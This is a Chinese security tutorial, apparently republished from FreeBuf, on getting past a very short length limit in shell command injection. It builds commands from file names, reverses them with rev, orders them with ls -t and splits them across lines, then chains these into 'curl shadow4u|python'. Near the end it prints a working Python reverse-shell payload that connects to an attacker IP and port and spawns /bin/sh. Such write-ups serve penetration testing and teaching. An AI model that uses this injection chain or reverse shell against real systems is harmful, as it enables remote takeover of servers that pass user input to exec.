挖洞经验 | 命令注入突破长度限制

0x01 背景

很多时候,在我们历经千辛万苦挖掘出一个漏洞或者找到一个利用点的时候,却因为一些egg hurt的限制,导致get shell或者send payload无法成功,其实很多高手都是有一些trick的,但是往往一串包含各种trick的高深payload甩得你不知所云

最近遇到这样一个问题。命令长度限制在5,如何完成注入get shell?

Array什么的都尝试无果,在学习了各种大牛的trick后,才恍然大悟,希望给初学者提供一些新的思路,集思广益。

0x02 命令组装

首先是命令组装,先来看一个例子,准备工作 mkdir cmd;cd cmd;

分别输入>echo >hello,可以看到分别创建了两个文件echo和 hello,然后执行*,结果输出了hello

很多人一定已经明白

此时等于 echo hello,我们可以通过**_echo _ 来查看*到底是啥

这样,我们通过>echo >hello 完成命令组装,然后* 组成并执行了命令echo hello

同样的道理

不过这次让我们把命令长度限制到4

那么如果我们要执行命令ls -l怎么办

我们模仿上面做法,输入>ls>-l产生了两个文件 ls -l

这有个问题,我们刚才生成的echo和hello,e 的顺序正好在h之前,所以ok。但是此时文件的显示顺序-l在 ls前面,如果我们执行 其实是执行_*-l ls_,会出现错误

那么如何获得ls -l呢,先是第一种思路

0x03 反转命令

我们把这个命令字符序列反过来看 l- sl

这样是不是顺序正好满足要求,接下来我们只需要用一个可以把字符反过来的命令,就可以完成这个功能

这样,我们先生成l-和sl两个命令

然后将l- sl组合写入文件v(为什么文件名要用v ,下面会解释,是个trick),最后用一个命令将文件中的字节反转

如果我们直接使用ls>v

可以看到文件v中多了一个v,对我们命令造成干扰

我们只想文件中存在l-和sl

_trick1 _

这里有个技巧

dir a b>c只会将a b写到文件c中

我们创建一个名为dir的文件,然后执行*>v,可以获得l- 和ls

接下来就是反序

trick2

有一个rev命令,正好可以将内容反序,我们产生一个名为rev的文件,然后执行*v ,此时命令相当于rev v(这里就是上面为啥文件命名为v,为了被通配符匹配),这样就产生了我们要的输出ls -l

然后就是输出到文件x,然后就可以执行sh x,成功以4 个字符执行长度为5的ls -l命令

整个命令链(长度<=4)

完成ls -l

0x04 控制顺序

理解上述命令之后

假设我们要生成ls -t >g

逆序是g< t- sl,按照字母顺序 t- 会在 sl 后面,不满足需要。所以我们变通一下,生成命令ls -th >g,逆序就是g> ht- sl,正好满足顺序要求,然后依葫芦画瓢

   _trick3_

上面说到文件名排列的时候有默认顺序,怎么自由控制顺序呢

其实ls -t 也就是根据mtime排序,新的在前面

而-h对顺序本身没什么影响,可以方便构造payload

比如我们要生成ls -l,可以通过ls -t打破默认顺序

0x05 命令续行

通过前面的一连串命令,我们已经得到ls -th >g

trick4

然后还有一点,linux的命令续行,比如l\s分成两行,都是ok

这样,我们就可以构造一连串的拼接命令续航。比如,我要构造命令curl shadow4u|python;

py\这里看着是5个字符,超过了4个的限制,实际上是因为 shell环境需要输入\产生\,但是php 代码exec时,只需要输入\即可产生\,比如 exec(“>py\”)即可。所以这里实际上是不超过4个字符的,为了演示直观,在shell中直接执行。

执行ls -th>g

然后sh g,实际执行反弹shell命令

curl shadow4u获得的内容

importsocket,subprocess,os;
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.190.138",6666));
os.dup2(s.fileno(),0);
os.dup2(s.fileno(),1);
os.dup2(s.fileno(),2);
p=subprocess.call(["/bin/sh","-i"]);

0x06 payload链

所以,完整payload链为

生成包含ls -th >g文件x

然后生成curl shadow4u|python命令续行文件

然后执行sh x把curl shadow4u|python命令写入文件g

然后执行sh g,getshell

0x07 总结

4个trick思路加上重定向和反弹shell知识

trick1 命令组装 dir a b >c trick2 通配符的妙用 *v=rev v trick3 按时间顺序排列文件 ls -t trick4 命令续行

原文发布于微信公众号 - FreeBuf(freebuf)

原文发表时间:2017-12-03

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

发表于

我来说两句

0 条评论
登录 后参与评论

相关文章

来自专栏FreeBuf

Java反序列化漏洞从理解到实践

一、前言 在学习新事物时,我们需要不断提醒自己一点:纸上得来终觉浅,绝知此事要躬行。这也是为什么我们在学到知识后要付诸实践的原因所在。在本文中,我们会深入分析大...

29510
来自专栏阿杜的世界

Spring Boot:定制URL匹配规则

构建web应用程序时,并不是所有的URL请求都遵循默认的规则。有时,我们希望RESTful URL匹配的时候包含定界符“.”,这种情况在Spring中可以称之为...

1263
来自专栏Python中文社区

Python云计算框架:OpenStack源码分析之RabbitMQ(二)

之前发布的文章因为在编辑后代码部分在手机上看不清已被及时删除,本文重新编辑好之后再发布一次,带来不便请谅解! 專 欄 ❈ ZZR,Python中文社区专栏作者...

3069
来自专栏magicsoar

C++编译与链接(2)-浅谈内部链接与外部链接

发现每次写技术博客时,都会在文章开头处花费一番功夫 ...从前,有一个程序员....他的名字叫magicsoar 为什么有时会出现aaa已在bbb中重定义的错误...

2799
来自专栏不会写文章的程序员不是好厨师

伪共享(False Sharing)和缓存行(Cache Line) 大杂烩

在上篇介绍LongAdder的文章中,我们最后留下了一个问题,为什么Cell中要插入很多个实际上并没有使用的Long变量?这个问题就得从False Sharin...

1471
来自专栏前端侠2.0

Angular技巧汇总 原

    声明项目的全局类型,同时不需要在各个Ts文件中import {XXX} from 'xxx'  ,就能直接引用!方法是:

1172
来自专栏一枝花算不算浪漫

[Redis]Redis 概述及基本使用规范.

5038
来自专栏芋道源码1024

【Netty 专栏】深入浅出 Netty 内存管理 PoolChunk

摘要: 原创出处 https://www.jianshu.com/p/c4bd37a3555b 「占小狼」欢迎转载,保留摘要,谢谢!

1140
来自专栏乐沙弥的世界

mongoDB简介及关键特性

761
来自专栏于晓飞的专栏

理解 CRLF,LF

CRLF, LF 是用来表示文本换行的方式。CR(Carriage Return) 代表回车,对应字符 '\r';LF(Line Feed) 代表换行,对应字符...

2153

扫码关注云+社区

领取腾讯云代金券